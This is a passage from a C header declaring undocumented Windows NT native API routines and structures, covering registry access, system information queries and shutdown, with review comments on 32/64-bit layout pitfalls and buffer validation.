PRTL_HANDLE_TABLE HandleTable, 810 
| OUT PULONG HandleIndex OPTIONAL 811 | ); 812 | 813 | 814 | NTSYSAPI 815 | BOOLEAN 816 | NTAPI 817 | RtlFreeHandle( 818 | IN PRTL_HANDLE_TABLE HandleTable, 819 | IN PRTL_HANDLE_TABLE_ENTRY Handle 820 | ); 821 | 822 | 823 | NTSYSAPI 824 | BOOLEAN 825 | NTAPI 826 | RtlIsValidIndexHandle( 827 | IN PRTL_HANDLE_TABLE HandleTable, 828 | IN ULONG HandleIndex, 829 | OUT PRTL_HANDLE_TABLE_ENTRY *Handle 830 | ); 831 | 832 | 833 | NTSYSAPI 834 | PVOID 835 | NTAPI 836 | RtlInsertElementGenericTable ( 837 | IN PRTL_GENERIC_TABLE Table, 838 | IN PVOID Buffer, 839 | IN LONG BufferSize, 840 | OUT PBOOLEAN NewElement OPTIONAL 841 | ); 842 | 843 | 844 | NTSYSAPI 845 | BOOLEAN 846 | NTAPI 847 | RtlIsGenericTableEmpty ( 848 | IN PRTL_GENERIC_TABLE Table 849 | ); 850 | 851 | 852 | NTSYSAPI 853 | BOOLEAN 854 | NTAPI 855 | RtlIsGenericTableEmpty ( 856 | IN PRTL_GENERIC_TABLE Table 857 | ); 858 | 859 | 860 | NTSYSAPI 861 | PVOID 862 | NTAPI 863 | RtlLookupElementGenericTable ( 864 | IN PRTL_GENERIC_TABLE Table, 865 | IN PVOID Buffer 866 | ); 867 | 868 | 869 | NTSYSAPI 870 | PVOID 871 | NTAPI 872 | RtlEnumerateGenericTableWithoutSplaying( 873 | IN PRTL_GENERIC_TABLE Table, 874 | IN PVOID *RestartKey 875 | ); 876 | 877 | 878 | NTSYSAPI 879 | NTSTATUS 880 | NTAPI 881 | NtClose( 882 | IN HANDLE Handle 883 | ); 884 | 885 | 886 | NTSYSAPI 887 | NTSTATUS 888 | NTAPI 889 | ZwClose( 890 | IN HANDLE Handle 891 | ); 892 | 893 | //----------------------------------------------------------------------------- 894 | // Environment functions 895 | 896 | NTSYSAPI 897 | NTSTATUS 898 | NTAPI 899 | RtlOpenCurrentUser( 900 | IN ULONG DesiredAccess, 901 | OUT PHANDLE CurrentUserKey 902 | ); 903 | 904 | 905 | NTSYSAPI 906 | NTSTATUS 907 | NTAPI 908 | RtlCreateEnvironment( 909 | BOOLEAN CloneCurrentEnvironment, 910 | PVOID *Environment 911 | ); 912 | 913 | 914 | NTSYSAPI 915 | NTSTATUS 916 | NTAPI 917 | RtlQueryEnvironmentVariable_U ( 918 | PVOID Environment, 919 | PUNICODE_STRING Name, 920 | PUNICODE_STRING 
Value 921 | ); 922 | 923 | 924 | NTSYSAPI 925 | NTSTATUS 926 | NTAPI 927 | RtlSetEnvironmentVariable( 928 | PVOID *Environment, 929 | PUNICODE_STRING Name, 930 | PUNICODE_STRING Value 931 | ); 932 | 933 | 934 | NTSYSAPI 935 | NTSTATUS 936 | NTAPI 937 | RtlDestroyEnvironment( 938 | PVOID Environment 939 | ); 940 | 941 | //----------------------------------------------------------------------------- 942 | // Registry functions 943 | 944 | 945 | typedef enum _KEY_INFORMATION_CLASS 946 | { 947 | KeyBasicInformation, 948 | KeyNodeInformation, 949 | KeyFullInformation, 950 | KeyNameInformation, 951 | KeyCachedInformation, 952 | KeyFlagsInformation, 953 | MaxKeyInfoClass // MaxKeyInfoClass should always be the last enum 954 | 955 | } KEY_INFORMATION_CLASS; 956 | 957 | // 958 | // Key query structures 959 | // 960 | 961 | typedef struct _KEY_BASIC_INFORMATION 962 | { 963 | LARGE_INTEGER LastWriteTime; 964 | ULONG TitleIndex; 965 | ULONG NameLength; 966 | WCHAR Name[1]; // Variable length string 967 | 968 | } KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION; 969 | 970 | 971 | typedef struct _KEY_NODE_INFORMATION 972 | { 973 | LARGE_INTEGER LastWriteTime; 974 | ULONG TitleIndex; 975 | ULONG ClassOffset; 976 | ULONG ClassLength; 977 | ULONG NameLength; 978 | WCHAR Name[1]; // Variable length string 979 | // Class[1]; // Variable length string not declared 980 | } KEY_NODE_INFORMATION, *PKEY_NODE_INFORMATION; 981 | 982 | 983 | typedef struct _KEY_FULL_INFORMATION 984 | { 985 | LARGE_INTEGER LastWriteTime; 986 | ULONG TitleIndex; 987 | ULONG ClassOffset; 988 | ULONG ClassLength; 989 | ULONG SubKeys; 990 | ULONG MaxNameLen; 991 | ULONG MaxClassLen; 992 | ULONG Values; 993 | ULONG MaxValueNameLen; 994 | ULONG MaxValueDataLen; 995 | WCHAR Class[1]; // Variable length 996 | 997 | } KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION; 998 | 999 | 1000 | // end_wdm 1001 | typedef struct _KEY_NAME_INFORMATION 1002 | { 1003 | ULONG NameLength; 1004 | WCHAR Name[1]; // Variable length string 
1005 | 1006 | } KEY_NAME_INFORMATION, *PKEY_NAME_INFORMATION; 1007 | 1008 | typedef struct _KEY_CACHED_INFORMATION 1009 | { 1010 | LARGE_INTEGER LastWriteTime; 1011 | ULONG TitleIndex; 1012 | ULONG SubKeys; 1013 | ULONG MaxNameLen; 1014 | ULONG Values; 1015 | ULONG MaxValueNameLen; 1016 | ULONG MaxValueDataLen; 1017 | ULONG NameLength; 1018 | WCHAR Name[1]; // Variable length string 1019 | 1020 | } KEY_CACHED_INFORMATION, *PKEY_CACHED_INFORMATION; 1021 | 1022 | 1023 | typedef struct _KEY_FLAGS_INFORMATION 1024 | { 1025 | ULONG UserFlags; 1026 | 1027 | } KEY_FLAGS_INFORMATION, *PKEY_FLAGS_INFORMATION; 1028 | 1029 | 1030 | 1031 | typedef enum _KEY_VALUE_INFORMATION_CLASS { 1032 | KeyValueBasicInformation, 1033 | KeyValueFullInformation, 1034 | KeyValuePartialInformation, 1035 | KeyValueFullInformationAlign64, 1036 | KeyValuePartialInformationAlign64, 1037 | MaxKeyValueInfoClass // MaxKeyValueInfoClass should always be the last enum 1038 | } KEY_VALUE_INFORMATION_CLASS; 1039 | 1040 | 1041 | typedef struct _KEY_VALUE_FULL_INFORMATION { 1042 | ULONG TitleIndex; 1043 | ULONG Type; 1044 | ULONG DataOffset; 1045 | ULONG DataLength; 1046 | ULONG NameLength; 1047 | WCHAR Name[1]; // Variable size 1048 | // Data[1]; // Variable size data not declared 1049 | } KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION; 1050 | 1051 | 1052 | typedef struct _KEY_VALUE_PARTIAL_INFORMATION { 1053 | ULONG TitleIndex; 1054 | ULONG Type; 1055 | ULONG DataLength; 1056 | UCHAR Data[1]; // Variable size 1057 | } KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION; 1058 | 1059 | 1060 | 1061 | NTSYSAPI 1062 | NTSTATUS 1063 | NTAPI 1064 | NtCreateKey( 1065 | OUT PHANDLE KeyHandle, 1066 | IN ACCESS_MASK DesiredAccess, 1067 | IN POBJECT_ATTRIBUTES ObjectAttributes, 1068 | IN ULONG TitleIndex, 1069 | IN PUNICODE_STRING Class OPTIONAL, 1070 | IN ULONG CreateOptions, 1071 | OUT PULONG Disposition OPTIONAL 1072 | ); 1073 | 1074 | 1075 | NTSYSAPI 1076 | NTSTATUS 1077 | NTAPI 1078 | 
NtOpenKey( 1079 | OUT PHANDLE KeyHandle, 1080 | IN ACCESS_MASK DesiredAccess, 1081 | IN POBJECT_ATTRIBUTES ObjectAttributes 1082 | ); 1083 | 1084 | NTSYSAPI 1085 | NTSTATUS 1086 | NTAPI 1087 | NtQueryKey( 1088 | IN HANDLE KeyHandle, 1089 | IN KEY_INFORMATION_CLASS KeyInformationClass, 1090 | OUT PVOID KeyInformation, 1091 | IN ULONG Length, 1092 | OUT PULONG ResultLength 1093 | ); 1094 | 1095 | NTSYSAPI 1096 | NTSTATUS 1097 | NTAPI 1098 | NtEnumerateKey( 1099 | IN HANDLE KeyHandle, 1100 | IN ULONG Index, 1101 | IN KEY_INFORMATION_CLASS KeyInformationClass, 1102 | IN PVOID KeyInformation, 1103 | IN ULONG Length, 1104 | IN PULONG ResultLength 1105 | ); 1106 | 1107 | 1108 | NTSYSAPI 1109 | NTSTATUS 1110 | NTAPI 1111 | NtDeleteKey( 1112 | IN HANDLE KeyHandle 1113 | ); 1114 | 1115 | 1116 | NTSYSAPI 1117 | NTSTATUS 1118 | NTAPI 1119 | NtQueryValueKey( 1120 | IN HANDLE KeyHandle, 1121 | IN PUNICODE_STRING ValueName, 1122 | IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, 1123 | OUT PVOID KeyValueInformation, 1124 | IN ULONG Length, 1125 | OUT PULONG ResultLength 1126 | ); 1127 | 1128 | 1129 | NTSYSAPI 1130 | NTSTATUS 1131 | NTAPI 1132 | NtSetValueKey( 1133 | IN HANDLE KeyHandle, 1134 | IN PUNICODE_STRING ValueName, 1135 | IN ULONG TitleIndex OPTIONAL, 1136 | IN ULONG Type, 1137 | IN PVOID Data, 1138 | IN ULONG DataSize 1139 | ); 1140 | 1141 | 1142 | NTSYSAPI 1143 | NTSTATUS 1144 | NTAPI 1145 | NtDeleteValueKey( 1146 | IN HANDLE KeyHandle, 1147 | IN PUNICODE_STRING ValueName 1148 | ); 1149 | 1150 | //----------------------------------------------------------------------------- 1151 | // RtlQueryRegistryValues 1152 | 1153 | // 1154 | // The following flags specify how the Name field of a RTL_QUERY_REGISTRY_TABLE 1155 | // entry is interpreted. A NULL name indicates the end of the table. 
1156 | // 1157 | 1158 | #define RTL_QUERY_REGISTRY_SUBKEY 0x00000001 // Name is a subkey and remainder of 1159 | // table or until next subkey are value 1160 | // names for that subkey to look at. 1161 | 1162 | #define RTL_QUERY_REGISTRY_TOPKEY 0x00000002 // Reset current key to original key for 1163 | // this and all following table entries. 1164 | 1165 | #define RTL_QUERY_REGISTRY_REQUIRED 0x00000004 // Fail if no match found for this table 1166 | // entry. 1167 | 1168 | #define RTL_QUERY_REGISTRY_NOVALUE 0x00000008 // Used to mark a table entry that has no 1169 | // value name, just wants a call out, not 1170 | // an enumeration of all values. 1171 | 1172 | #define RTL_QUERY_REGISTRY_NOEXPAND 0x00000010 // Used to suppress the expansion of 1173 | // REG_MULTI_SZ into multiple callouts or 1174 | // to prevent the expansion of environment 1175 | // variable values in REG_EXPAND_SZ 1176 | 1177 | #define RTL_QUERY_REGISTRY_DIRECT 0x00000020 // QueryRoutine field ignored. EntryContext 1178 | // field points to location to store value. 1179 | // For null terminated strings, EntryContext 1180 | // points to UNICODE_STRING structure that 1181 | // that describes maximum size of buffer. 1182 | // If .Buffer field is NULL then a buffer is 1183 | // allocated. 1184 | // 1185 | 1186 | #define RTL_QUERY_REGISTRY_DELETE 0x00000040 // Used to delete value keys after they 1187 | // are queried. 1188 | 1189 | 1190 | // 1191 | // The following values for the RelativeTo parameter determine what the 1192 | // Path parameter to RtlQueryRegistryValues is relative to. 
1193 | // 1194 | 1195 | #define RTL_REGISTRY_ABSOLUTE 0 // Path is a full path 1196 | #define RTL_REGISTRY_SERVICES 1 // \Registry\Machine\System\CurrentControlSet\Services 1197 | #define RTL_REGISTRY_CONTROL 2 // \Registry\Machine\System\CurrentControlSet\Control 1198 | #define RTL_REGISTRY_WINDOWS_NT 3 // \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion 1199 | #define RTL_REGISTRY_DEVICEMAP 4 // \Registry\Machine\Hardware\DeviceMap 1200 | #define RTL_REGISTRY_USER 5 // \Registry\User\CurrentUser 1201 | #define RTL_REGISTRY_MAXIMUM 6 1202 | #define RTL_REGISTRY_HANDLE 0x40000000 // Low order bits are registry handle 1203 | #define RTL_REGISTRY_OPTIONAL 0x80000000 // Indicates the key node is optional 1204 | 1205 | 1206 | typedef NTSTATUS (NTAPI * PRTL_QUERY_REGISTRY_ROUTINE)( 1207 | IN PWSTR ValueName, 1208 | IN ULONG ValueType, 1209 | IN PVOID ValueData, 1210 | IN ULONG ValueLength, 1211 | IN PVOID Context, 1212 | IN PVOID EntryContext 1213 | ); 1214 | 1215 | typedef struct _RTL_QUERY_REGISTRY_TABLE 1216 | { 1217 | PRTL_QUERY_REGISTRY_ROUTINE QueryRoutine; 1218 | ULONG Flags; 1219 | PWSTR Name; 1220 | PVOID EntryContext; 1221 | ULONG DefaultType; 1222 | PVOID DefaultData; 1223 | ULONG DefaultLength; 1224 | 1225 | } RTL_QUERY_REGISTRY_TABLE, *PRTL_QUERY_REGISTRY_TABLE; 1226 | 1227 | 1228 | NTSYSAPI 1229 | NTSTATUS 1230 | NTAPI 1231 | RtlQueryRegistryValues( 1232 | IN ULONG RelativeTo, 1233 | IN PCWSTR Path, 1234 | IN PRTL_QUERY_REGISTRY_TABLE QueryTable, 1235 | IN PVOID Context, 1236 | IN PVOID Environment OPTIONAL 1237 | ); 1238 | 1239 | 1240 | //----------------------------------------------------------------------------- 1241 | // Query system information 1242 | 1243 | typedef enum _SYSTEM_INFORMATION_CLASS 1244 | { 1245 | SystemBasicInformation, // 0x00 SYSTEM_BASIC_INFORMATION 1246 | SystemProcessorInformation, // 0x01 SYSTEM_PROCESSOR_INFORMATION 1247 | SystemPerformanceInformation, // 0x02 1248 | SystemTimeOfDayInformation, // 0x03 1249 | 
SystemPathInformation, // 0x04 1250 | SystemProcessInformation, // 0x05 1251 | SystemCallCountInformation, // 0x06 1252 | SystemDeviceInformation, // 0x07 1253 | SystemProcessorPerformanceInformation, // 0x08 1254 | SystemFlagsInformation, // 0x09 1255 | SystemCallTimeInformation, // 0x0A 1256 | SystemModuleInformation, // 0x0B SYSTEM_MODULE_INFORMATION 1257 | SystemLocksInformation, // 0x0C 1258 | SystemStackTraceInformation, // 0x0D 1259 | SystemPagedPoolInformation, // 0x0E 1260 | SystemNonPagedPoolInformation, // 0x0F 1261 | SystemHandleInformation, // 0x10 1262 | SystemObjectInformation, // 0x11 1263 | SystemPageFileInformation, // 0x12 1264 | SystemVdmInstemulInformation, // 0x13 1265 | SystemVdmBopInformation, // 0x14 1266 | SystemFileCacheInformation, // 0x15 1267 | SystemPoolTagInformation, // 0x16 1268 | SystemInterruptInformation, // 0x17 1269 | SystemDpcBehaviorInformation, // 0x18 1270 | SystemFullMemoryInformation, // 0x19 1271 | SystemLoadGdiDriverInformation, // 0x1A 1272 | SystemUnloadGdiDriverInformation, // 0x1B 1273 | SystemTimeAdjustmentInformation, // 0x1C 1274 | SystemSummaryMemoryInformation, // 0x1D 1275 | SystemNextEventIdInformation, // 0x1E 1276 | SystemEventIdsInformation, // 0x1F 1277 | SystemCrashDumpInformation, // 0x20 1278 | SystemExceptionInformation, // 0x21 1279 | SystemCrashDumpStateInformation, // 0x22 1280 | SystemKernelDebuggerInformation, // 0x23 1281 | SystemContextSwitchInformation, // 0x24 1282 | SystemRegistryQuotaInformation, // 0x25 1283 | SystemExtendServiceTableInformation, // 0x26 1284 | SystemPrioritySeperation, // 0x27 1285 | SystemPlugPlayBusInformation, // 0x28 1286 | SystemDockInformation, // 0x29 1287 | //SystemPowerInformation, // 0x2A 1288 | //SystemProcessorSpeedInformation, // 0x2B 1289 | //SystemCurrentTimeZoneInformation, // 0x2C 1290 | //SystemLookasideInformation // 0x2D 1291 | 1292 | } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; 1293 | 1294 | // 1295 | // Thread priority 1296 | // 1297 | 
// Scheduling priority value as reported by the kernel (used for BasePriority
// below and for thread priorities elsewhere in this header).
typedef LONG KPRIORITY;

//
// Basic System information
// NtQuerySystemInformation with SystemBasicInformation
//
// NOTE(review): the address/affinity fields are declared as 32-bit here
// (MinimumUserModeAddress, MaximumUserModeAddress) while the kernel fills
// pointer-sized values on 64-bit Windows; other public definitions declare
// them ULONG_PTR. Verify this layout before relying on it in an x64 build.
//

typedef struct _SYSTEM_BASIC_INFORMATION {
    ULONG Reserved;
    ULONG TimerResolution;
    ULONG PageSize;
    ULONG NumberOfPhysicalPages;
    ULONG LowestPhysicalPageNumber;
    ULONG HighestPhysicalPageNumber;
    ULONG AllocationGranularity;
    ULONG MinimumUserModeAddress;          // see NOTE(review) above: 32-bit only as declared
    ULONG MaximumUserModeAddress;          // see NOTE(review) above: 32-bit only as declared
    KAFFINITY ActiveProcessorsAffinityMask;
    CCHAR NumberOfProcessors;
} SYSTEM_BASIC_INFORMATION, *PSYSTEM_BASIC_INFORMATION;

//
// Processor information
// NtQuerySystemInformation with SystemProcessorInformation
//

typedef struct _SYSTEM_PROCESSOR_INFORMATION {
    USHORT ProcessorArchitecture;
    USHORT ProcessorLevel;
    USHORT ProcessorRevision;
    USHORT Reserved;
    ULONG ProcessorFeatureBits;
} SYSTEM_PROCESSOR_INFORMATION, *PSYSTEM_PROCESSOR_INFORMATION;

//
// Performance information
// NtQuerySystemInformation with SystemPerformanceInformation
//
// Fixed-size block of system-wide counters. The kernel may return more data
// than this definition covers on newer releases; size the query buffer from
// ReturnLength rather than assuming sizeof() is the exact length.
//

typedef struct _SYSTEM_PERFORMANCE_INFORMATION {
    LARGE_INTEGER IdleProcessTime;
    LARGE_INTEGER IoReadTransferCount;
    LARGE_INTEGER IoWriteTransferCount;
    LARGE_INTEGER IoOtherTransferCount;
    ULONG IoReadOperationCount;
    ULONG IoWriteOperationCount;
    ULONG IoOtherOperationCount;
    ULONG AvailablePages;
    ULONG CommittedPages;
    ULONG CommitLimit;
    ULONG PeakCommitment;
    ULONG PageFaultCount;
    ULONG CopyOnWriteCount;
    ULONG TransitionCount;
    ULONG CacheTransitionCount;
    ULONG DemandZeroCount;
    ULONG PageReadCount;
    ULONG PageReadIoCount;
    ULONG CacheReadCount;
    ULONG CacheIoCount;
    ULONG DirtyPagesWriteCount;
    ULONG DirtyWriteIoCount;
    ULONG MappedPagesWriteCount;
    ULONG MappedWriteIoCount;
    ULONG PagedPoolPages;
    ULONG NonPagedPoolPages;
    ULONG PagedPoolAllocs;
    ULONG PagedPoolFrees;
    ULONG NonPagedPoolAllocs;
    ULONG NonPagedPoolFrees;
    ULONG FreeSystemPtes;
    ULONG ResidentSystemCodePage;
    ULONG TotalSystemDriverPages;
    ULONG TotalSystemCodePages;
    ULONG NonPagedPoolLookasideHits;
    ULONG PagedPoolLookasideHits;
    ULONG Spare3Count;
    ULONG ResidentSystemCachePage;
    ULONG ResidentPagedPoolPage;
    ULONG ResidentSystemDriverPage;
    ULONG CcFastReadNoWait;
    ULONG CcFastReadWait;
    ULONG CcFastReadResourceMiss;
    ULONG CcFastReadNotPossible;
    ULONG CcFastMdlReadNoWait;
    ULONG CcFastMdlReadWait;
    ULONG CcFastMdlReadResourceMiss;
    ULONG CcFastMdlReadNotPossible;
    ULONG CcMapDataNoWait;
    ULONG CcMapDataWait;
    ULONG CcMapDataNoWaitMiss;
    ULONG CcMapDataWaitMiss;
    ULONG CcPinMappedDataCount;
    ULONG CcPinReadNoWait;
    ULONG CcPinReadWait;
    ULONG CcPinReadNoWaitMiss;
    ULONG CcPinReadWaitMiss;
    ULONG CcCopyReadNoWait;
    ULONG CcCopyReadWait;
    ULONG CcCopyReadNoWaitMiss;
    ULONG CcCopyReadWaitMiss;
    ULONG CcMdlReadNoWait;
    ULONG CcMdlReadWait;
    ULONG CcMdlReadNoWaitMiss;
    ULONG CcMdlReadWaitMiss;
    ULONG CcReadAheadIos;
    ULONG CcLazyWriteIos;
    ULONG CcLazyWritePages;
    ULONG CcDataFlushes;
    ULONG CcDataPages;
    ULONG ContextSwitches;
    ULONG FirstLevelTbFills;
    ULONG SecondLevelTbFills;
    ULONG SystemCalls;
} SYSTEM_PERFORMANCE_INFORMATION, *PSYSTEM_PERFORMANCE_INFORMATION;

//
// Time of Day information
// NtQuerySystemInformation with SystemTimeOfDayInformation
//

typedef struct _SYSTEM_TIMEOFDAY_INFORMATION {
    LARGE_INTEGER BootTime;
    LARGE_INTEGER CurrentTime;
    LARGE_INTEGER TimeZoneBias;
    ULONG TimeZoneId;
    ULONG Reserved;
} SYSTEM_TIMEOFDAY_INFORMATION, *PSYSTEM_TIMEOFDAY_INFORMATION;

//
// Process information
// NtQuerySystemInformation with SystemProcessInformation
//
// This is a deliberately truncated prefix of the per-process record: the
// kernel returns a chain of variable-length entries and this definition stops
// after HandleCount (see the "platform dependent" comment inside). Walk the
// list with NextEntryOffset (0 marks the last entry), never with sizeof(), and
// bounds-check each offset against the buffer length before dereferencing.
// ImageName.Buffer points inside the same query buffer, so it is only valid
// while that buffer is alive.
//

typedef struct _SYSTEM_PROCESS_INFORMATION {
    ULONG NextEntryOffset;                 // byte offset to the next entry; 0 = last
    ULONG NumberOfThreads;
    LARGE_INTEGER SpareLi1;
    LARGE_INTEGER SpareLi2;
    LARGE_INTEGER SpareLi3;
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ImageName;              // counted string; Buffer lives in the query buffer
    KPRIORITY BasePriority;
    ULONG_PTR UniqueProcessId;             // process id carried as a pointer-sized integer
    ULONG_PTR InheritedFromUniqueProcessId; // parent process id (may already be reused)
    ULONG HandleCount;
    // Next part is platform dependent

} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

//
// Device information
// NtQuerySystemInformation with SystemDeviceInformation
//

typedef struct _SYSTEM_DEVICE_INFORMATION {
    ULONG NumberOfDisks;
    ULONG NumberOfFloppies;
    ULONG NumberOfCdRoms;
    ULONG NumberOfTapes;
    ULONG NumberOfSerialPorts;
    ULONG NumberOfParallelPorts;
} SYSTEM_DEVICE_INFORMATION, *PSYSTEM_DEVICE_INFORMATION;

//
// Processor performance information
// NtQuerySystemInformation with SystemProcessorPerformanceInformation
//
// The query returns one of these per processor; the buffer must hold
// NumberOfProcessors entries.
//

typedef struct _SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION {
    LARGE_INTEGER IdleTime;
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER DpcTime;          // DEVL only
    LARGE_INTEGER InterruptTime;    // DEVL only
    ULONG InterruptCount;
} SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION, *PSYSTEM_PROCESSOR_PERFORMANCE_INFORMATION;

//
// NT Global Flag information
// NtQuerySystemInformation with SystemFlagsInformation
//

typedef struct _SYSTEM_FLAGS_INFORMATION
{
    ULONG GlobalFlag;                      // NtGlobalFlag bit mask (FLG_* values)

} SYSTEM_FLAGS_INFORMATION, *PSYSTEM_FLAGS_INFORMATION;

//
// System Module information
// NtQuerySystemInformation with SystemModuleInformation
//
// NOTE(review): this is the 32-bit layout. Other public definitions start the
// entry with two pointer-sized fields (a section handle and a mapped base), so
// on x64 the two ULONG "Reserved" fields below are 8 bytes short and Base, Size
// and ImageName would be read at the wrong offsets. Confirm against a 64-bit
// definition before using this from an x64 build.
//

typedef struct _SYSTEM_MODULE
{
    ULONG  Reserved1;               // Should be 0xBAADF00D
    ULONG  Reserved2;               // Should be zero
    PVOID  Base;                    // load address of the kernel module
    ULONG  Size;                    // image size in bytes
    ULONG  Flags;
    USHORT Index;
    USHORT Unknown;
    USHORT LoadCount;
    USHORT ModuleNameOffset;        // offset into ImageName, presumably of the file-name part of the path
    CHAR   ImageName[256];          // ANSI path; bound all reads by 256 rather than trusting a terminator

} SYSTEM_MODULE, *PSYSTEM_MODULE;

// Variable-length result: ModulesCount entries follow in Modules[]. Size the
// buffer from the ReturnLength of a first (failing) NtQuerySystemInformation
// call and validate ModulesCount against the returned length before indexing.
typedef struct _SYSTEM_MODULE_INFORMATION
{
    ULONG ModulesCount;
    SYSTEM_MODULE Modules[1];

} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

// The definitions below are disabled in this copy of the header and kept for
// reference only; none of them are referenced by the declarations that follow.
/*
typedef struct _SYSTEM_VDM_INSTEMUL_INFO {
    ULONG SegmentNotPresent ;
    ULONG VdmOpcode0F       ;
    ULONG OpcodeESPrefix    ;
    ULONG OpcodeCSPrefix    ;
    ULONG OpcodeSSPrefix    ;
    ULONG OpcodeDSPrefix    ;
    ULONG OpcodeFSPrefix    ;
    ULONG OpcodeGSPrefix    ;
    ULONG OpcodeOPER32Prefix;
    ULONG OpcodeADDR32Prefix;
    ULONG OpcodeINSB        ;
    ULONG OpcodeINSW        ;
    ULONG OpcodeOUTSB       ;
    ULONG OpcodeOUTSW       ;
    ULONG OpcodePUSHF       ;
    ULONG OpcodePOPF        ;
    ULONG OpcodeINTnn       ;
    ULONG OpcodeINTO        ;
    ULONG OpcodeIRET        ;
    ULONG OpcodeINBimm      ;
    ULONG OpcodeINWimm      ;
    ULONG OpcodeOUTBimm     ;
    ULONG OpcodeOUTWimm     ;
    ULONG OpcodeINB         ;
    ULONG OpcodeINW         ;
    ULONG OpcodeOUTB        ;
    ULONG OpcodeOUTW        ;
    ULONG OpcodeLOCKPrefix  ;
    ULONG OpcodeREPNEPrefix ;
    ULONG OpcodeREPPrefix   ;
    ULONG OpcodeHLT         ;
    ULONG OpcodeCLI         ;
    ULONG OpcodeSTI         ;
    ULONG BopCount          ;
} SYSTEM_VDM_INSTEMUL_INFO, *PSYSTEM_VDM_INSTEMUL_INFO;


typedef struct _SYSTEM_QUERY_TIME_ADJUST_INFORMATION {
    ULONG TimeAdjustment;
    ULONG TimeIncrement;
    BOOLEAN Enable;
} SYSTEM_QUERY_TIME_ADJUST_INFORMATION, *PSYSTEM_QUERY_TIME_ADJUST_INFORMATION;

typedef struct _SYSTEM_SET_TIME_ADJUST_INFORMATION {
    ULONG TimeAdjustment;
    BOOLEAN Enable;
} SYSTEM_SET_TIME_ADJUST_INFORMATION, *PSYSTEM_SET_TIME_ADJUST_INFORMATION;


typedef struct _SYSTEM_THREAD_INFORMATION {
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG WaitTime;
    PVOID StartAddress;
    CLIENT_ID ClientId;
    KPRIORITY Priority;
    LONG BasePriority;
    ULONG ContextSwitches;
    ULONG ThreadState;
    ULONG WaitReason;
} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;

typedef struct _SYSTEM_MEMORY_INFO {
    PUCHAR StringOffset;
    USHORT ValidCount;
    USHORT TransitionCount;
    USHORT ModifiedCount;
    USHORT PageTableCount;
} SYSTEM_MEMORY_INFO, *PSYSTEM_MEMORY_INFO;

typedef struct _SYSTEM_MEMORY_INFORMATION {
    ULONG InfoSize;
    ULONG StringStart;
    SYSTEM_MEMORY_INFO Memory[1];
} SYSTEM_MEMORY_INFORMATION, *PSYSTEM_MEMORY_INFORMATION;

typedef struct _SYSTEM_CALL_COUNT_INFORMATION {
    ULONG Length;
    ULONG NumberOfTables;
    //ULONG NumberOfEntries[NumberOfTables];
    //ULONG CallCounts[NumberOfTables][NumberOfEntries];
} SYSTEM_CALL_COUNT_INFORMATION, *PSYSTEM_CALL_COUNT_INFORMATION;

typedef struct _SYSTEM_CRASH_DUMP_INFORMATION {
    HANDLE CrashDumpSection;
} SYSTEM_CRASH_DUMP_INFORMATION, *PSYSTEM_CRASH_DUMP_INFORMATION;

typedef struct _SYSTEM_EXCEPTION_INFORMATION {
    ULONG AlignmentFixupCount;
    ULONG ExceptionDispatchCount;
    ULONG FloatingEmulationCount;
    ULONG ByteWordEmulationCount;
} SYSTEM_EXCEPTION_INFORMATION, *PSYSTEM_EXCEPTION_INFORMATION;

typedef struct _SYSTEM_CRASH_STATE_INFORMATION {
    ULONG ValidCrashDump;
} SYSTEM_CRASH_STATE_INFORMATION, *PSYSTEM_CRASH_STATE_INFORMATION;

typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION {
    BOOLEAN KernelDebuggerEnabled;
    BOOLEAN KernelDebuggerNotPresent;
} SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION;

typedef struct _SYSTEM_REGISTRY_QUOTA_INFORMATION {
    ULONG RegistryQuotaAllowed;
    ULONG RegistryQuotaUsed;
    ULONG PagedPoolSize;
} SYSTEM_REGISTRY_QUOTA_INFORMATION, *PSYSTEM_REGISTRY_QUOTA_INFORMATION;

typedef struct _SYSTEM_GDI_DRIVER_INFORMATION {
    UNICODE_STRING DriverName;
    PVOID ImageAddress;
    PVOID SectionPointer;
    PVOID EntryPoint;
    PIMAGE_EXPORT_DIRECTORY ExportSectionPointer;
} SYSTEM_GDI_DRIVER_INFORMATION, *PSYSTEM_GDI_DRIVER_INFORMATION;
*/

//
// NtQuerySystemInformation
//
// Copies the record selected by SystemInformationClass into SystemInformation.
// For the variable-length classes (SystemProcessInformation,
// SystemModuleInformation, ...) the usual pattern is to call once with a small
// buffer, expect STATUS_INFO_LENGTH_MISMATCH, reallocate to *ReturnLength and
// retry in a loop - the required size can grow between calls as processes or
// modules are created. Treat the returned buffer as untrusted input: validate
// every offset and count against SystemInformationLength before use.
//
NTSYSAPI
NTSTATUS
NTAPI
NtQuerySystemInformation(
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,      // size of the caller's buffer in bytes
    OUT PULONG ReturnLength                // bytes written, or bytes required on length mismatch
    );

//------------------------------------------------------------------------------
// Shutdown system

// Action requested from NtShutdownSystem.
typedef enum _SHUTDOWN_ACTION
{
    ShutdownNoReboot,                      // halt without restarting
    ShutdownReboot,                        // restart
    ShutdownPowerOff                       // power down

} SHUTDOWN_ACTION, *PSHUTDOWN_ACTION;

// NOTE(review): a shutdown request needs the shutdown privilege enabled in the
// caller's token; without it the call is expected to fail with a privilege
// error rather than shut the machine down.
NTSYSAPI
NTSTATUS
NTAPI
NtShutdownSystem(
    IN SHUTDOWN_ACTION Action
    );

